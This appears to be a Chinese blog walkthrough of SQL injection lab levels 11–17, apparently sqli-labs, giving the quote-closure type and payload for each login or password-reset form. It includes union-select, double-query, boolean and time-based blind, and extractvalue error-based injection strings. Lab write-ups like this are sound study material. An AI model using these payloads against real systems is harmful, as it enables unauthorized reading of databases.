第十一关
显错注入,单引号闭合。
uname和passwd两个参数都可以进行注入,这里在uname注入。
数据库名:uname=1.1' union select 1,database() #
1.png
第十二关
显错注入,双引号闭合,把11关的单引号换成双引号即可。
第十三关
双查询注入,单引号括号闭合。
之前GET类型有讲过,这里不细说了。
数据库名:uname=1') union select count(*),concat(0x7e,(select database()),floor(rand(14)*2),0x7e) as a from information_schema.tables group by a #
2.png
第十四关
双查询注入,双引号闭合,把13关的单引号括号换成双引号即可。
第十五关
盲注,单引号闭合。
正确页面:
错误页面:
4.png
数据库长度:uname=1' or 1=1 and length(database())=8 #
猜数据库名:uname=1' or 1=1 and ascii(substr((select database()),1,1))=115 #
数据表长度:uname=1' or 1=1 and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6,1,sleep(5)) #
猜数据表名:uname=1' or 1=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102,sleep(5),0) #
注:时间盲注的时候,使用sleep函数一直转不停,不知道什么原因。
第十六关
盲注,双引号括号闭合,做法和15关一样。
第十七关
显错注入,这是一个密码重置页面,所以要在用户名框填入一个已有的用户名,可以去前几关查users表。在密码框进行注入,单引号闭合。
5.png
数据库名:uname=admin&passwd=' and extractvalue(1,concat(0x7e,(select database()),0x7e)) #
网友评论